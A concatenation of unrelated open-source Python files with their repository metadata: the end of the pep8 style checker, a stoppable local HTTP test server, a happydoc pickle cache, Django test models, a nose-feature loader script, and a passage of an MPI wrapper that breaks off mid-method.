rv[path] = set()
return dict([(os.path.join(parent, path), rows)
for (path, rows) in rv.items()
if rows and filename_match(path, patterns)])
def filename_match(filename, patterns, default=True):
"""
Check if patterns contains a pattern that matches filename.
If patterns is unspecified, this always returns True.
"""
if not patterns:
return default
return any(fnmatch(filename, pattern) for pattern in patterns)
##############################################################################
# Framework to run all checks
##############################################################################
_checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}}
def register_check(check, codes=None):
"""
Register a new check object.
"""
def _add_check(check, kind, codes, args):
if check in _checks[kind]:
_checks[kind][check][0].extend(codes or [])
else:
_checks[kind][check] = (codes or [''], args)
if inspect.isfunction(check):
args = inspect.getargspec(check)[0]
if args and args[0] in ('physical_line', 'logical_line'):
if codes is None:
codes = ERRORCODE_REGEX.findall(check.__doc__ or '')
_add_check(check, args[0], codes, args)
elif inspect.isclass(check):
if inspect.getargspec(check.__init__)[0][:2] == ['self', 'tree']:
_add_check(check, 'tree', codes, None)
def init_checks_registry():
"""
Register all globally visible functions where the first argument name
is 'physical_line' or 'logical_line'.
"""
mod = inspect.getmodule(register_check)
for (name, function) in inspect.getmembers(mod, inspect.isfunction):
register_check(function)
init_checks_registry()
class Checker(object):
"""
Load a Python source file, tokenize it, check coding style.
"""
def __init__(self, filename=None, lines=None,
options=None, report=None, **kwargs):
if options is None:
options = StyleGuide(kwargs).options
else:
assert not kwargs
self._io_error = None
self._physical_checks = options.physical_checks
self._logical_checks = options.logical_checks
self._ast_checks = options.ast_checks
self.max_line_length = options.max_line_length
self.hang_closing = options.hang_closing
self.verbose = options.verbose
self.filename = filename
if filename is None:
self.filename = 'stdin'
self.lines = lines or []
elif filename == '-':
self.filename = 'stdin'
self.lines = stdin_get_value().splitlines(True)
elif lines is None:
try:
self.lines = readlines(filename)
except IOError:
exc_type, exc = sys.exc_info()[:2]
self._io_error = '%s: %s' % (exc_type.__name__, exc)
self.lines = []
else:
self.lines = lines
if self.lines:
ord0 = ord(self.lines[0][0])
if ord0 in (0xef, 0xfeff): # Strip the UTF-8 BOM
if ord0 == 0xfeff:
self.lines[0] = self.lines[0][1:]
elif self.lines[0][:3] == '\xef\xbb\xbf':
self.lines[0] = self.lines[0][3:]
self.report = report or options.report
self.report_error = self.report.error
def report_invalid_syntax(self):
exc_type, exc = sys.exc_info()[:2]
if len(exc.args) > 1:
offset = exc.args[1]
if len(offset) > 2:
offset = offset[1:3]
else:
offset = (1, 0)
self.report_error(offset[0], offset[1] or 0,
'E901 %s: %s' % (exc_type.__name__, exc.args[0]),
self.report_invalid_syntax)
report_invalid_syntax.__doc__ = " Check if the syntax is valid."
def readline(self):
"""
Get the next line from the input buffer.
"""
self.line_number += 1
if self.line_number > len(self.lines):
return ''
return self.lines[self.line_number - 1]
def readline_check_physical(self):
"""
Check and return the next physical line. This method can be
used to feed tokenize.generate_tokens.
"""
line = self.readline()
if line:
self.check_physical(line)
return line
def run_check(self, check, argument_names):
"""
Run a check plugin.
"""
arguments = []
for name in argument_names:
arguments.append(getattr(self, name))
return check(*arguments)
def check_physical(self, line):
"""
Run all physical checks on a raw input line.
"""
self.physical_line = line
if self.indent_char is None and line[:1] in WHITESPACE:
self.indent_char = line[0]
for name, check, argument_names in self._physical_checks:
result = self.run_check(check, argument_names)
if result is not None:
offset, text = result
self.report_error(self.line_number, offset, text, check)
def build_tokens_line(self):
"""
Build a logical line from tokens.
"""
self.mapping = []
logical = []
comments = []
length = 0
previous = None
for token in self.tokens:
token_type, text = token[0:2]
if token_type == tokenize.COMMENT:
comments.append(text)
continue
if token_type in SKIP_TOKENS:
continue
if token_type == tokenize.STRING:
text = mute_string(text)
if previous:
end_row, end = previous[3]
start_row, start = token[2]
if end_row != start_row: # different row
prev_text = self.lines[end_row - 1][end - 1]
if prev_text == ',' or (prev_text not in '{[('
and text not in '}])'):
logical.append(' ')
length += 1
elif end != start: # different column
fill = self.lines[end_row - 1][end:start]
logical.append(fill)
length += len(fill)
self.mapping.append((length, token))
logical.append(text)
length += len(text)
previous = token
self.logical_line = ''.join(logical)
self.noqa = comments and noqa(''.join(comments))
# With Python 2, if the line ends with '\r\r\n' the assertion fails
# assert self.logical_line.strip() == self.logical_line
def check_logical(self):
"""
Build a line from tokens and run all logical checks on it.
"""
self.build_tokens_line()
self.report.increment_logical_line()
first_line = self.lines[self.mapping[0][1][2][0] - 1]
indent = first_line[:self.mapping[0][1][2][1]]
self.previous_indent_level = self.indent_level
self.indent_level = expand_indent(indent)
if self.verbose >= 2:
print(self.logical_line[:80].rstrip())
for name, check, argument_names in self._logical_checks:
if self.verbose >= 4:
print(' ' + name)
for result in self.run_check(check, argument_names):
offset, text = result
if isinstance(offset, tuple):
orig_number, orig_offset = offset
else:
for token_offset, token in self.mapping:
if offset >= token_offset:
orig_number = token[2][0]
orig_offset = (token[2][1] + offset - token_offset)
self.report_error(orig_number, orig_offset, text, check)
self.previous_logical = self.logical_line
def check_ast(self):
try:
tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST)
except (SyntaxError, TypeError):
return self.report_invalid_syntax()
for name, cls, _ in self._ast_checks:
checker = cls(tree, self.filename)
for lineno, offset, text, check in checker.run():
if not noqa(self.lines[lineno - 1]):
self.report_error(lineno, offset, text, check)
def generate_tokens(self):
if self._io_error:
self.report_error(1, 0, 'E902 %s' % self._io_error, readlines)
tokengen = tokenize.generate_tokens(self.readline_check_physical)
try:
for token in tokengen:
yield token
except (SyntaxError, tokenize.TokenError):
self.report_invalid_syntax()
def check_all(self, expected=None, line_offset=0):
"""
Run all checks on the input file.
"""
self.report.init_file(self.filename, self.lines, expected, line_offset)
if self._ast_checks:
self.check_ast()
self.line_number = 0
self.indent_char = None
self.indent_level = 0
self.previous_logical = ''
self.tokens = []
self.blank_lines = blank_lines_before_comment = 0
parens = 0
for token in self.generate_tokens():
self.tokens.append(token)
token_type, text = token[0:2]
if self.verbose >= 3:
if token[2][0] == token[3][0]:
pos = '[%s:%s]' % (token[2][1] or '', token[3][1])
else:
pos = 'l.%s' % token[3][0]
print('l.%s\t%s\t%s\t%r' %
(token[2][0], pos, tokenize.tok_name[token[0]], text))
if token_type == tokenize.OP:
if text in '([{':
parens += 1
elif text in '}])':
parens -= 1
elif not parens:
if token_type == tokenize.NEWLINE:
if self.blank_lines < blank_lines_before_comment:
self.blank_lines = blank_lines_before_comment
self.check_logical()
self.tokens = []
self.blank_lines = blank_lines_before_comment = 0
elif token_type == tokenize.NL:
if len(self.tokens) == 1:
# The physical line contains only this token.
self.blank_lines += 1
self.tokens = []
elif token_type == tokenize.COMMENT and len(self.tokens) == 1:
if blank_lines_before_comment < self.blank_lines:
blank_lines_before_comment = self.blank_lines
self.blank_lines = 0
if COMMENT_WITH_NL:
# The comment also ends a physical line
self.tokens = []
return self.report.get_file_results()
class BaseReport(object):
"""Collect the results of the checks."""
print_filename = False
def __init__(self, options):
self._benchmark_keys = options.benchmark_keys
self._ignore_code = options.ignore_code
# Results
self.elapsed = 0
self.total_errors = 0
self.counters = dict.fromkeys(self._benchmark_keys, 0)
self.messages = {}
def start(self):
"""Start the timer."""
self._start_time = time.time()
def stop(self):
"""Stop the timer."""
self.elapsed = time.time() - self._start_time
def init_file(self, filename, lines, expected, line_offset):
"""Signal a new file."""
self.filename = filename
self.lines = lines
self.expected = expected or ()
self.line_offset = line_offset
self.file_errors = 0
self.counters['files'] += 1
self.counters['physical lines'] += len(lines)
def increment_logical_line(self):
"""Signal a new logical line."""
self.counters['logical lines'] += 1
def error(self, line_number, offset, text, check):
"""Report an error, according to options."""
code = text[:4]
if self._ignore_code(code):
return
if code in self.counters:
self.counters[code] += 1
else:
self.counters[code] = 1
self.messages[code] = text[5:]
# Don't care about expected errors or warnings
if code in self.expected:
return
if self.print_filename and not self.file_errors:
print(self.filename)
self.file_errors += 1
self.total_errors += 1
return code
def get_file_results(self):
"""Return the count of errors and warnings for this file."""
return self.file_errors
def get_count(self, prefix=''):
"""Return the total count of errors and warnings."""
return sum([self.counters[key]
for key in self.messages if key.startswith(prefix)])
def get_statistics(self, prefix=''):
"""
Get statistics for message codes that start with the prefix.
prefix='' matches all errors and warnings
prefix='E' matches all errors
prefix='W' matches all warnings
prefix='E4' matches all errors that have to do with imports
"""
return ['%-7s %s %s' % (self.counters[key], key, self.messages[key])
for key in sorted(self.messages) if key.startswith(prefix)]
def print_statistics(self, prefix=''):
"""Print overall statistics (number of errors and warnings)."""
for line in self.get_statistics(prefix):
print(line)
def print_benchmark(self):
"""Print benchmark numbers."""
print('%-7.2f %s' % (self.elapsed, 'seconds elapsed'))
if self.elapsed:
for key in self._benchmark_keys:
print('%-7d %s per second (%d total)' %
(self.counters[key] / self.elapsed, key,
self.counters[key]))
class FileReport(BaseReport):
"""Collect the results of the checks and print only the filenames."""
print_filename = True
class StandardReport(BaseReport):
"""Collect and print the results of the checks."""
def __init__(self, options):
super(StandardReport, self).__init__(options)
self._fmt = REPORT_FORMAT.get(options.format.lower(),
options.format)
self._repeat = options.repeat
self._show_source = options.show_source
self._show_pep8 = options.show_pep8
def init_file(self, filename, lines, expected, line_offset):
"""Signal a new file."""
self._deferred_print = []
return super(StandardReport, self).init_file(
filename, lines, expected, line_offset)
def error(self, line_number, offset, text, check):
"""Report an error, according to options."""
code = super(StandardReport, self).error(line_number, offset,
text, check)
if code and (self.counters[code] == 1 or self._repeat):
self._deferred_print.append(
(line_number, offset, code, text[5:], check.__doc__))
return code
def get_file_results(self):
"""Print the result and return the overall count for this file."""
self._deferred_print.sort()
for line_number, offset, code, text, doc in self._deferred_print:
print(self._fmt % {
'path': self.filename,
'row': self.line_offset + line_number, 'col': offset + 1,
'code': code, 'text': text,
})
if self._show_source:
if line_number > len(self.lines):
line = ''
else:
line = self.lines[line_number - 1]
print(line.rstrip())
print(' ' * offset + '^')
if self._show_pep8 and doc:
print(doc.lstrip('\n').rstrip())
return self.file_errors
class DiffReport(StandardReport):
"""Collect and print the results for the changed lines only."""
def __init__(self, options):
super(DiffReport, self).__init__(options)
self._selected = options.selected_lines
def error(self, line_number, offset, text, check):
if line_number not in self._selected[self.filename]:
return
return super(DiffReport, self).error(line_number, offset, text, check)
class StyleGuide(object):
"""Initialize a PEP-8 instance with few options."""
def __init__(self, *args, **kwargs):
# build options from the command line
self.checker_class = kwargs.pop('checker_class', Checker)
parse_argv = kwargs.pop('parse_argv', False)
config_file = kwargs.pop('config_file', None)
parser = kwargs.pop('parser', None)
options, self.paths = process_options(
parse_argv=parse_argv, config_file=config_file, parser=parser)
if args or kwargs:
# build options from dict
options_dict = dict(*args, **kwargs)
options.__dict__.update(options_dict)
if 'paths' in options_dict:
self.paths = options_dict['paths']
self.runner = self.input_file
self.options = options
if not options.reporter:
options.reporter = BaseReport if options.quiet else StandardReport
for index, value in enumerate(options.exclude):
options.exclude[index] = value.rstrip('/')
options.select = tuple(options.select or ())
if not (options.select or options.ignore or
options.testsuite or options.doctest) and DEFAULT_IGNORE:
# The default choice: ignore controversial checks
options.ignore = tuple(DEFAULT_IGNORE.split(','))
else:
# Ignore all checks which are not explicitly selected
options.ignore = ('',) if options.select else tuple(options.ignore)
options.benchmark_keys = BENCHMARK_KEYS[:]
options.ignore_code = self.ignore_code
options.physical_checks = self.get_checks('physical_line')
options.logical_checks = self.get_checks('logical_line')
options.ast_checks = self.get_checks('tree')
self.init_report()
def init_report(self, reporter=None):
"""Initialize the report instance."""
self.options.report = (reporter or self.options.reporter)(self.options)
return self.options.report
def check_files(self, paths=None):
"""Run all checks on the paths."""
if paths is None:
paths = self.paths
report = self.options.report
runner = self.runner
report.start()
try:
for path in paths:
if os.path.isdir(path):
self.input_dir(path)
elif not self.excluded(path):
runner(path)
except KeyboardInterrupt:
print('... stopped')
report.stop()
return report
def input_file(self, filename, lines=None, expected=None, line_offset=0):
"""Run all checks on a Python source file."""
if self.options.verbose:
print('checking %s' % filename)
fchecker = self.checker_class(
filename, lines=lines, options=self.options)
return fchecker.check_all(expected=expected, line_offset=line_offset)
def input_dir(self, dirname):
"""Check all files in this directory and all subdirectories."""
dirname = dirname.rstrip('/')
if self.excluded(dirname):
return 0
counters = self.options.report.counters
verbose = self.options.verbose
filepatterns = self.options.filename
runner = self.runner
for root, dirs, files in os.walk(dirname):
if verbose:
print('directory ' + root)
counters['directories'] += 1
for subdir in sorted(dirs):
if self.excluded(subdir, root):
dirs.remove(subdir)
for filename in sorted(files):
# contain a pattern that matches?
if ((filename_match(filename, filepatterns) and
not self.excluded(filename, root))):
runner(os.path.join(root, filename))
def excluded(self, filename, parent=None):
"""
Check if options.exclude contains a pattern that matches filename.
"""
if not self.options.exclude:
return False
basename = os.path.basename(filename)
if filename_match(basename, self.options.exclude):
return True
if parent:
filename = os.path.join(parent, filename)
return filename_match(filename, self.options.exclude)
def ignore_code(self, code):
"""
Check if the error code should be ignored.
If 'options.select' contains a prefix of the error code,
return False. Else, if 'options.ignore' contains a prefix of
the error code, return True.
"""
return (code.startswith(self.options.ignore) and
not code.startswith(self.options.select))
def get_checks(self, argument_name):
"""
Find all globally visible functions where the first argument name
starts with argument_name and which contain selected tests.
"""
checks = []
for check, attrs in _checks[argument_name].items():
(codes, args) = attrs
if any(not (code and self.ignore_code(code)) for code in codes):
checks.append((check.__name__, check, args))
return sorted(checks)
def get_parser(prog='pep8', version=__version__):
parser = OptionParser(prog=prog, version=version,
usage="%prog [options] input ...")
parser.config_options = [
'exclude', 'filename', 'select', 'ignore', 'max-line-length',
'hang-closing', 'count', 'format', 'quiet', 'show-pep8',
'show-source', 'statistics', 'verbose']
parser.add_option('-v', '--verbose', default=0, action='count',
help="print status messages, or debug with -vv")
parser.add_option('-q', '--quiet', default=0, action='count',
help="report only file names, or nothing with -qq")
parser.add_option('-r', '--repeat', default=True, action='store_true',
help="(obsolete) show all occurrences of the same error")
parser.add_option('--first', action='store_false', dest='repeat',
help="show first occurrence of each error")
parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE,
help="exclude files or directories which match these "
"comma separated patterns (default: %default)")
parser.add_option('--filename', metavar='patterns', default='*.py',
help="when parsing directories, only check filenames "
"matching these comma separated patterns "
"(default: %default)")
parser.add_option('--select', metavar='errors', default='',
help="select errors and warnings (e.g. E,W6)")
parser.add_option('--ignore', metavar='errors', default='',
help="skip errors and warnings (e.g. E4,W)")
parser.add_option('--show-source', action='store_true',
help="show source code for each error")
parser.add_option('--show-pep8', action='store_true',
help="show text of PEP 8 for each error "
"(implies --first)")
parser.add_option('--statistics', action='store_true',
help="count errors and warnings")
parser.add_option('--count', action='store_true',
help="print total number of errors and warnings "
"to standard error and set exit code to 1 if "
"total is not null")
parser.add_option('--max-line-length', type='int', metavar='n',
default=MAX_LINE_LENGTH,
help="set maximum allowed line length "
"(default: %default)")
parser.add_option('--hang-closing', action='store_true',
help="hang closing bracket instead of matching "
"indentation of opening bracket's line")
parser.add_option('--format', metavar='format', default='default',
help="set the error format [default|pylint|<custom>]")
parser.add_option('--diff', action='store_true',
help="report only lines changed according to the "
"unified diff received on STDIN")
group = parser.add_option_group("Testing Options")
if os.path.exists(TESTSUITE_PATH):
group.add_option('--testsuite', metavar='dir',
help="run regression tests from dir")
group.add_option('--doctest', action='store_true',
help="run doctest on myself")
group.add_option('--benchmark', action='store_true',
help="measure processing speed")
return parser
def read_config(options, args, arglist, parser):
"""Read both user configuration and local configuration."""
config = RawConfigParser()
user_conf = options.config
if user_conf and os.path.isfile(user_conf):
if options.verbose:
print('user configuration: %s' % user_conf)
config.read(user_conf)
parent = tail = args and os.path.abspath(os.path.commonprefix(args))
while tail:
if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]):
if options.verbose:
print('local configuration: in %s' % parent)
break
parent, tail = os.path.split(parent)
pep8_section = parser.prog
if config.has_section(pep8_section):
option_list = dict([(o.dest, o.type or o.action)
for o in parser.option_list])
# First, read the default values
new_options, _ = parser.parse_args([])
# Second, parse the configuration
for opt in config.options(pep8_section):
if options.verbose > 1:
print(" %s = %s" % (opt, config.get(pep8_section, opt)))
if opt.replace('_', '-') not in parser.config_options:
print("Unknown option: '%s'\n not in [%s]" %
(opt, ' '.join(parser.config_options)))
sys.exit(1)
normalized_opt = opt.replace('-', '_')
opt_type = option_list[normalized_opt]
if opt_type in ('int', 'count'):
value = config.getint(pep8_section, opt)
elif opt_type == 'string':
value = config.get(pep8_section, opt)
else:
assert opt_type in ('store_true', 'store_false')
value = config.getboolean(pep8_section, opt)
setattr(new_options, normalized_opt, value)
# Third, overwrite with the command-line options
options, _ = parser.parse_args(arglist, values=new_options)
options.doctest = options.testsuite = False
return options
def process_options(arglist=None, parse_argv=False, config_file=None,
parser=None):
"""Process options passed either via arglist or via command line args."""
if not arglist and not parse_argv:
# Don't read the command line if the module is used as a library.
arglist = []
if not parser:
parser = get_parser()
if not parser.has_option('--config'):
if config_file is True:
config_file = DEFAULT_CONFIG
group = parser.add_option_group("Configuration", description=(
"The project options are read from the [%s] section of the "
"tox.ini file or the setup.cfg file located in any parent folder "
"of the path(s) being processed. Allowed options are: %s." %
(parser.prog, ', '.join(parser.config_options))))
group.add_option('--config', metavar='path', default=config_file,
help="user config file location (default: %default)")
options, args = parser.parse_args(arglist)
options.reporter = None
if options.ensure_value('testsuite', False):
args.append(options.testsuite)
elif not options.ensure_value('doctest', False):
if parse_argv and not args:
if options.diff or any(os.path.exists(name)
for name in PROJECT_CONFIG):
args = ['.']
else:
parser.error('input not specified')
options = read_config(options, args, arglist, parser)
options.reporter = parse_argv and options.quiet == 1 and FileReport
options.filename = options.filename and options.filename.split(',')
options.exclude = options.exclude.split(',')
options.select = options.select and options.select.split(',')
options.ignore = options.ignore and options.ignore.split(',')
if options.diff:
options.reporter = DiffReport
stdin = stdin_get_value()
options.selected_lines = parse_udiff(stdin, options.filename, args[0])
args = sorted(options.selected_lines)
return options, args
def _main():
"""Parse options and run checks on Python source."""
pep8style = StyleGuide(parse_argv=True, config_file=True)
options = pep8style.options
if options.doctest or options.testsuite:
from testsuite.support import run_tests
report = run_tests(pep8style)
else:
report = pep8style.check_files()
if options.statistics:
report.print_statistics()
if options.benchmark:
report.print_benchmark()
if options.testsuite and not options.quiet:
report.print_results()
if report.total_errors:
if options.count:
sys.stderr.write(str(report.total_errors) + '\n')
sys.exit(1)
if __name__ == '__main__':
_main()
| brianbruggeman/git-hooks | pep8.py | Python | mit | 70,826 |
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/336012
import SimpleHTTPServer
import BaseHTTPServer
import httplib
import os
class StoppableHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""http request handler with QUIT stopping the server"""
def do_QUIT(self):
"""send 200 OK response, and set server.stop to True"""
self.send_response(200)
self.end_headers()
self.server.stop = True
def do_POST(self):
# We could also process paremeters here using something like below.
# length = self.headers['Content-Length']
# print self.rfile.read(int(length))
self.do_GET()
def send_head(self):
# This is ripped directly from SimpleHTTPRequestHandler,
# only the cookie part is added.
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
if ctype.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
try:
f = open(path, mode)
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
class StoppableHttpServer(BaseHTTPServer.HTTPServer):
"""http server that reacts to self.stop flag"""
def serve_forever(self):
"""Handle one request at a time until stopped."""
self.stop = False
while not self.stop:
self.handle_request()
def stop_server(port=7000):
"""send QUIT request to http server running on localhost:<port>"""
conn = httplib.HTTPConnection("localhost:%d" % port)
conn.request("QUIT", "/")
conn.getresponse()
def start_server(port=7000):
import os
os.chdir(os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), '..'))
server = StoppableHttpServer(('', port), StoppableHttpRequestHandler)
server.serve_forever()
if __name__ == '__main__':
import sys
if len(sys.argv) != 2 or sys.argv[1] not in [ 'start', 'stop' ]:
print 'usage: %s start|stop' % sys.argv[0]
sys.exit(1)
if sys.argv[1] == 'start':
start_server()
else:
stop_server()
| gotcha/Selenium2Library | test/resources/testserver/testserver.py | Python | apache-2.0 | 3,425 |
(S'd07b7bd90a798b2024e1f84c66405c0a'
p1
(ihappydoclib.parseinfo.moduleinfo
ModuleInfo
p2
(dp3
S'_namespaces'
p4
((dp5
(dp6
S'write_array'
p7
(ihappydoclib.parseinfo.functioninfo
FunctionInfo
p8
(dp9
g4
((dp10
(dp11
tp12
sS'_exception_info'
p13
(dp14
sS'_parameter_names'
p15
(S'f'
S'set'
p16
S'item_sep'
p17
S'nest_prefix'
p18
S'nest_suffix'
p19
S'nest_sep'
p20
tp21
sS'_parameter_info'
p22
(dp23
g16
(NNNtp24
sS'f'
(NNNtp25
sg17
(I1
NNtp26
sg19
(I1
NNtp27
sg18
(I1
NNtp28
sg20
(I1
NNtp29
ssS'_filename'
p30
S'Gnuplot/utils.py'
p31
sS'_docstring'
p32
S''
sS'_name'
p33
g7
sS'_parent'
p34
g2
sS'_comment_info'
p35
(dp36
sS'_configuration_values'
p37
(dp38
sS'_class_info'
p39
g10
sS'_function_info'
p40
g11
sS'_comments'
p41
S''
sbsS'float_array'
p42
(ihappydoclib.parseinfo.functioninfo
FunctionInfo
p43
(dp44
g4
((dp45
(dp46
tp47
sg13
(dp48
sg15
(S'm'
tp49
sg22
(dp50
S'm'
(NNNtp51
ssg30
g31
sg32
S''
sg33
g42
sg34
g2
sg35
g36
sg37
(dp52
sg39
g45
sg40
g46
sg41
S''
sbstp53
sS'_import_info'
p54
(ihappydoclib.parseinfo.imports
ImportInfo
p55
(dp56
S'_named_imports'
p57
(dp58
sS'_straight_imports'
p59
(lp60
sbsg30
g31
sg32
S''
sg33
S'utils'
p61
sg34
Nsg35
g36
sg37
(dp62
S'include_comments'
p63
I1
sS'cacheFilePrefix'
p64
S'.happydoc.'
p65
sS'useCache'
p66
I1
sS'docStringFormat'
p67
S'StructuredText'
p68
ssg39
g5
sg40
g6
sg41
S''
sbt. | mads-bertelsen/McCode | meta-pkgs/windows/Support/gnuplot-py-1.8/.happydoc.utils.py | Python | gpl-2.0 | 1,337 |
"""
Comments may be attached to any object. See the comment documentation for
more information.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Author(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
def __str__(self):
return '%s %s' % (self.first_name, self.last_name)
@python_2_unicode_compatible
class Article(models.Model):
author = models.ForeignKey(Author)
headline = models.CharField(max_length=100)
def __str__(self):
return self.headline
@python_2_unicode_compatible
class Entry(models.Model):
title = models.CharField(max_length=250)
body = models.TextField()
pub_date = models.DateField()
enable_comments = models.BooleanField(default=False)
def __str__(self):
return self.title
class Book(models.Model):
dewey_decimal = models.DecimalField(primary_key=True, decimal_places=2, max_digits=5)
| DanteOnline/free-art | venv/lib/python3.4/site-packages/tests/testapp/models.py | Python | gpl-3.0 | 1,064 |
# coding:utf-8
'''
Created on 2017/12/20.
@author: chk01
'''
from practice_one.Company.load_material.utils import *
org = 'nose'
def get_point_feature():
print('开始{}导入'.format(org))
dir_path = os.listdir('material/cartoon/nose/model')
m = 12
n = 6
X = np.zeros([m, n, 2]) + 999
Y = np.zeros([m, 1]) + 999
for i, sourceDir in enumerate(dir_path):
_id = int(sourceDir.split('.')[0])
full_path = 'material/cartoon/nose/model/' + sourceDir
landmark72, _, _, _, _ = get_baseInfo(full_path)
landmark72 = landmark72_trans(landmark72)
feature = point2feature_nose(landmark72)
X[_id - 1] = feature
Y[_id - 1] = _id
print('load--->{}---图{}'.format(org, _id))
scio.savemat('material/feature_matrix/nose', {"X": X, "Y": Y})
print('完成{}导入'.format(org))
if __name__ == '__main__':
get_point_feature()
| sunyihuan326/DeltaLab | shuwei_fengge/practice_one/Company/download/nose_check.py | Python | mit | 916 |
"""
MMPI - MPI Interface for Python
Copyright (C) 2005 Michael Steder(steder@gmail.com)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
"""
request.py
Defines a Request object and overloads asynchronous I/O
methods that normally return integer request handles to
instead return Request objects.
Request objects have a __int__ method to automatically
convert them back to integer handles for use with
_mpi functions.
"""
import core
def test( request ):
"""
ready = test( request )
if ( test( request )):
print 'Non-blocking send or receive operation is complete!'
Note that the request object is no longer valid after this call
returns successfully and the operation is complete.
"""
#raise NotImplementedError,"test has not yet been implemented"
# Invalid Request ID's (ID's for Sends/Recvs that have completed)
# will cause a crash if they are passed directly to core.mpi_test.
return request.test()
def wait( request ):
"""
result = wait( mpi_request )
request,buffer = mpi.irecv( ... )
# Do other work:
# ...
# wait for the receive to complete so I can use buffer:
wait(request)
print 'Received:',buffer
"""
#raise NotImplementedError,"wait has not yet been implemented"
# Invalid Request ID's (ID's for Sends/Recvs that have completed)
# will cause a crash if they are passed directly to core.mpi_test.
return request.wait()
def isend( buffer, count, datatype, destination, tag, comm ):
"""
request = isend(buffer, count, datatype, destination, tag, communicator)
Send 'buffer', which consists of 'count' elements of type 'datatype',
to the processor in 'comm' that has rank 'destination' and is waiting
for a message with tag == 'tag'.
Buffer: Can be a single numeric value or a numeric array.
Count: Number of elements in an array, or 1 for scalar data.
Datatype: One of a few type constants defined in the mpi module.
Destination: Rank in the specified communicator to send this message to.
Tag: An arbitrary value used to route messages more precisely.
Tags are often ignored (especially in simpler programs). If
you don't care what the tag is use: MPI_ANY_TAG
Comm: The communicator that contains 'destination'
Request: Request is an integer that represents this nonblocking
send operation. You use this handle to check on the status of this
isend by calling functions like test() and wait().
Example:
request = send( Numeric.ones(10), 10, MPI_INT, 1, 7, MPI_COMM_WORLD )
if ( test( request ) ):
print 'Send complete!'
# Wait for the send to complete before proceeding:
wait( request )
"""
#raise NotImplementedError,"Non-Blocking I/O does not work(yet)"
id = core.isend( buffer, count, datatype, destination, tag, comm )
request = Request( "send", id, buffer, count, datatype, destination, tag, comm )
return request
def irecv( count, datatype, source, tag, comm ):
"""
request_id, buffer = irecv( count, datatype, source, tag, communicator )
irecv and recv have the same argument list but differ in return values.
receive 'buffer', which consists of 'count' elements of type 'datatype',
from the processor in 'comm' that has rank 'source' and is waiting
for a message with tag == 'tag'.
Request_Id: This is an integer that provides a handle to pass
to the functions 'test' and 'wait'.
Buffer: Can be a single numeric value or a numeric array.
Count: Number of elements in an array, or 1 for scalar data.
Datatype: One of a few type constants defined in the mpi module.
Source: Rank in the specified communicator to receive this message from.
Tag: An arbitrary value used to route messages more precisely.
Tags are often ignored (especially in simpler programs). If
you don't care what the tag is use: MPI_ANY_TAG
Comm: The communicator that contains 'destination'
--------------
Example:
# Start a recv for a 10 element array:
>>> request,buffer = mpi.irecv( 10, mpi.MPI_INT, 0, 0, mpi.MPI_COMM_WORLD )
>>> print 'Request #: %s'%(request)
Request #: 134985008
>>> print 'buffer: %s'%(buffer)
buffer: [0 0 0 0 0 0 0 0 0 0]
>>> A = Numeric.array([1,2,3,4,5,6,7,8,9,10],Numeric.Int32)
>>> send_request = mpi.isend( A, 10, mpi.MPI_INT, 0, 0, mpi.MPI_COMM_WORLD )
>>> print 'Sending Request: %s'%(send_request)
Sending Request: -1409286143
>>> mpi.wait( request )
>>> print 'buffer(after send): %s'%(buffer)
buffer(after send): [ 1 2 3 4 5 6 7 8 9 10]
--------------
It's important to note that the initial value of 'buffer' is essentially
undefined. The values in 'buffer' can not be trusted until the irecv
operation is complete.
We can either use test() or wait() to determine that the irecv has
finished.
The wait() call blocks while test() returns immediately.
After the call to wait() buffer is guaranteed to be set.
"""
#raise NotImplementedError,"Non-Blocking I/O does not work(yet)"
id,buffer = core.irecv( count, datatype, source, tag, comm )
request = Request( "recv", id, buffer, count, datatype, source, tag, comm )
return request,buffer
class Request:
"""
Request objects encapsulate request ID's along with the
buffers they are associated with and the count, type, source
tag, and comm information.
This allows the user to examine the types of pending(and completed)
requests they have going on. Also, these objects can and will check
their own state. You can determine the status and even get the data
by simply calling the appropriate method on the request object.
Important methods are:
test() - returns true (the send/recv has completed) or false.
wait() - does not return until the data is available.
status() - prints a description of this request and tests to see if it is complete.
"""
def __init__(self, type, id, buffer, count, datatype, source_or_destination, tag, comm ):
"""
Creates a request object. This is used internally by the MPI
module. You should never have to manually create a request object.
my_request = Request( type('send' or 'recv'), request_id, buffer, count, type, source_or_destination, tag, comm )
"""
self.type = type
self.id = id
self.buffer = buffer
self.count = count
self.datatype = datatype
self.target = source_or_destination
self.tag = tag
self.comm = comm
self.valid = True
self.status = None
def __int__(self):
return self.id
def test(self):
"""
ready = request.test()
if ( request.test() ):
print 'Nonblocking Send/Recv Operation completed!'
"""
# It's important to note that requests are only valid
# until the communication operation that they represent
# completes.
# A call to the C test() routine with an invalid
# request ID will crash.
